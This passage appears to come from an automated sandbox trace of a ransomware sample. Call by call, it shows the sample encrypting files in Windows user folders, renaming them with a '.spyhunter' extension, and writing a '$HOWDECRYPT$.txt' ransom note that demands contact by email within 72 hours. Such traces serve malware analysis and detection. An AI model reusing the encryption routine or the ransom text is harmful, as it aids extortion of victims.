"c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.spyhunter")) returned 1 [0142.994] GetProcessHeap () returned 0x2c0000 [0142.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.994] GetProcessHeap () returned 0x2c0000 [0142.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0142.994] GetProcessHeap () returned 0x2c0000 [0142.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffe8a8 | out: hHeap=0x2c0000) returned 1 [0142.994] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f018 | out: pbBuffer=0x57f018) returned 1 [0142.994] GetProcessHeap () returned 0x2c0000 [0142.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0142.994] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f010*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f010*=0x30) returned 1 [0142.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.995] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned 58 [0142.995] StrStrW (lpFirst="Jellyfish.jpg", lpSrch=".txt") returned 0x0 [0142.995] GetProcessHeap () returned 0x2c0000 [0142.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0142.995] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57efd4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57efd4*=0x2800, lpOverlapped=0x0) returned 1 [0143.013] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.013] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57efd4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57efd4*=0x2800, lpOverlapped=0x0) returned 1 [0143.013] GetProcessHeap () returned 0x2c0000 [0143.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0143.013] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.014] WriteFile (in: hFile=0x178, lpBuffer=0x57f014*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57efd4, lpOverlapped=0x0 | out: lpBuffer=0x57f014*, lpNumberOfBytesWritten=0x57efd4*=0x4, lpOverlapped=0x0) returned 1 [0143.073] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57efd4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57efd4*=0x30, lpOverlapped=0x0) returned 1 [0143.074] CloseHandle (hObject=0x178) returned 1 [0143.074] GetProcessHeap () returned 0x2c0000 [0143.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.074] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.spyhunter") returned 68 [0143.074] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.spyhunter" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.spyhunter")) returned 1 [0143.074] GetProcessHeap () returned 0x2c0000 [0143.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.075] GetProcessHeap () returned 0x2c0000 [0143.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.075] GetProcessHeap () returned 0x2c0000 [0143.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffe7e8 | out: hHeap=0x2c0000) returned 1 [0143.075] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f018 | out: pbBuffer=0x57f018) returned 1 [0143.075] GetProcessHeap () returned 0x2c0000 [0143.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.075] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f010*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f010*=0x30) returned 1 [0143.075] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0143.076] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 76 [0143.076] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".txt") returned 0x0 [0143.076] GetProcessHeap () returned 0x2c0000 [0143.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0143.076] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57efd4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57efd4*=0x2800, lpOverlapped=0x0) returned 1 [0143.135] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.136] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57efd4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57efd4*=0x2800, lpOverlapped=0x0) returned 1 [0143.136] GetProcessHeap () returned 0x2c0000 [0143.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0143.136] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.136] WriteFile (in: hFile=0x178, lpBuffer=0x57f014*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57efd4, lpOverlapped=0x0 | out: lpBuffer=0x57f014*, lpNumberOfBytesWritten=0x57efd4*=0x4, lpOverlapped=0x0) returned 1 [0143.136] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57efd4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57efd4*=0x30, lpOverlapped=0x0) returned 1 [0143.136] CloseHandle (hObject=0x178) returned 1 [0143.136] GetProcessHeap () returned 0x2c0000 [0143.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.137] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.spyhunter") returned 86 [0143.137] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.spyhunter" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.spyhunter")) returned 1 [0143.137] GetProcessHeap () returned 0x2c0000 [0143.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.137] GetProcessHeap () returned 0x2c0000 [0143.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.138] GetProcessHeap () returned 0x2c0000 [0143.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f32960 | out: hHeap=0x2c0000) returned 1 [0143.138] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f010 | out: pbBuffer=0x57f010) returned 1 [0143.138] GetProcessHeap () returned 0x2c0000 [0143.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.138] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f008*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f008*=0x30) returned 1 [0143.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0143.138] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG") returned 35 [0143.138] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch=".txt") returned 0x0 [0143.138] GetProcessHeap () returned 0x2c0000 [0143.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0143.139] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57efcc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57efcc*=0x400, lpOverlapped=0x0) returned 1 [0143.264] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffc00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.264] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x57efcc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57efcc*=0x400, lpOverlapped=0x0) returned 1 [0143.264] GetProcessHeap () returned 0x2c0000 [0143.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0143.264] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.264] WriteFile (in: hFile=0x178, lpBuffer=0x57f00c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57efcc, lpOverlapped=0x0 | out: lpBuffer=0x57f00c*, lpNumberOfBytesWritten=0x57efcc*=0x4, lpOverlapped=0x0) returned 1 [0143.264] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57efcc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57efcc*=0x30, lpOverlapped=0x0) returned 1 [0143.264] CloseHandle (hObject=0x178) returned 1 [0143.264] GetProcessHeap () returned 0x2c0000 [0143.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.264] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.spyhunter") returned 45 [0143.264] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.spyhunter" (normalized: "c:\\users\\default\\ntuser.dat.log.spyhunter")) returned 1 [0143.265] GetProcessHeap () returned 0x2c0000 [0143.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.265] GetProcessHeap () returned 0x2c0000 [0143.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.265] GetProcessHeap () returned 0x2c0000 [0143.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30e778 | out: hHeap=0x2c0000) returned 1 [0143.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\links\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0143.266] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.266] WriteFile (in: hFile=0x178, lpBuffer=0x57ef43*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57f06c, lpOverlapped=0x0 | out: lpBuffer=0x57ef43*, lpNumberOfBytesWritten=0x57f06c*=0x127, lpOverlapped=0x0) returned 1 [0143.267] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.267] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57f06c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57f06c*=0x2ac, lpOverlapped=0x0) returned 1 [0143.267] CloseHandle (hObject=0x178) returned 1 [0143.267] GetProcessHeap () returned 0x2c0000 [0143.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0afe8 | out: hHeap=0x2c0000) returned 1 [0143.267] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f008 | out: pbBuffer=0x57f008) returned 1 [0143.268] GetProcessHeap () returned 0x2c0000 [0143.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.268] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f000*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f000*=0x30) returned 1 [0143.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\default\\links\\recentplaces.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0143.268] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk") returned 43 [0143.268] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch=".txt") returned 0x0 [0143.268] GetProcessHeap () returned 0x2c0000 [0143.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0143.268] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57efc4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57efc4*=0x16b, lpOverlapped=0x0) returned 1 [0143.269] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe95, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.269] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x16b, lpNumberOfBytesWritten=0x57efc4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57efc4*=0x16b, lpOverlapped=0x0) returned 1 [0143.269] GetProcessHeap () returned 0x2c0000 [0143.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0143.269] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.269] WriteFile (in: hFile=0x178, lpBuffer=0x57f004*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57efc4, lpOverlapped=0x0 | out: lpBuffer=0x57f004*, lpNumberOfBytesWritten=0x57efc4*=0x4, lpOverlapped=0x0) returned 1 [0143.269] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57efc4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57efc4*=0x30, lpOverlapped=0x0) returned 1 [0143.269] CloseHandle (hObject=0x178) returned 1 [0143.270] GetProcessHeap () returned 0x2c0000 [0143.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.270] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk.spyhunter") returned 53 [0143.270] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\default\\links\\recentplaces.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk.spyhunter" (normalized: "c:\\users\\default\\links\\recentplaces.lnk.spyhunter")) returned 1 [0143.270] GetProcessHeap () returned 0x2c0000 [0143.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.270] GetProcessHeap () returned 0x2c0000 [0143.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.270] GetProcessHeap () returned 0x2c0000 [0143.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0af48 | out: hHeap=0x2c0000) returned 1 [0143.270] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f008 | out: pbBuffer=0x57f008) returned 1 [0143.270] GetProcessHeap () returned 0x2c0000 [0143.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.270] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f000*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f000*=0x30) returned 1 [0143.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk" (normalized: "c:\\users\\default\\links\\downloads.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0143.271] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk") returned 40 [0143.271] StrStrW (lpFirst="Downloads.lnk", lpSrch=".txt") returned 0x0 [0143.271] GetProcessHeap () returned 0x2c0000 [0143.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0143.271] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57efc4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57efc4*=0x37e, lpOverlapped=0x0) returned 1 [0143.406] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffc82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.406] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x57efc4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57efc4*=0x37e, lpOverlapped=0x0) returned 1 [0143.406] GetProcessHeap () returned 0x2c0000 [0143.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0143.406] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.406] WriteFile (in: hFile=0x178, lpBuffer=0x57f004*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57efc4, lpOverlapped=0x0 | out: lpBuffer=0x57f004*, lpNumberOfBytesWritten=0x57efc4*=0x4, lpOverlapped=0x0) returned 1 [0143.406] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57efc4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57efc4*=0x30, lpOverlapped=0x0) returned 1 [0143.406] CloseHandle (hObject=0x178) returned 1 [0143.406] GetProcessHeap () returned 0x2c0000 [0143.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0143.407] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk.spyhunter") returned 50 [0143.407] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk" (normalized: "c:\\users\\default\\links\\downloads.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk.spyhunter" (normalized: "c:\\users\\default\\links\\downloads.lnk.spyhunter")) returned 1 [0143.545] GetProcessHeap () returned 0x2c0000 [0143.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0143.545] GetProcessHeap () returned 0x2c0000 [0143.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.545] GetProcessHeap () returned 0x2c0000 [0143.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0a908 | out: hHeap=0x2c0000) returned 1 [0143.545] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f000 | out: pbBuffer=0x57f000) returned 1 [0143.545] GetProcessHeap () returned 0x2c0000 [0143.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.545] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eff8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eff8*=0x30) returned 1 [0143.545] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.586] GetProcessHeap () returned 0x2c0000 [0143.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0143.586] GetProcessHeap () returned 0x2c0000 [0143.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffe668 | out: hHeap=0x2c0000) returned 1 [0143.586] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f000 | out: pbBuffer=0x57f000) returned 1 [0143.586] GetProcessHeap () returned 0x2c0000 [0143.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0143.586] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eff8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eff8*=0x30) returned 1 [0143.586] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0143.587] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk") returned 122 [0143.587] StrStrW (lpFirst="Windows Media Player.lnk", lpSrch=".txt") returned 0x0 [0143.587] GetProcessHeap () returned 0x2c0000 [0143.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0143.588] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57efbc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57efbc*=0x60b, lpOverlapped=0x0) returned 1 [0143.609] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff9f5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.610] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x60b, lpNumberOfBytesWritten=0x57efbc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57efbc*=0x60b, lpOverlapped=0x0) returned 1 [0143.610] GetProcessHeap () returned 0x2c0000 [0143.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0143.610] SetFilePointerEx (in: hFile=0xb0, 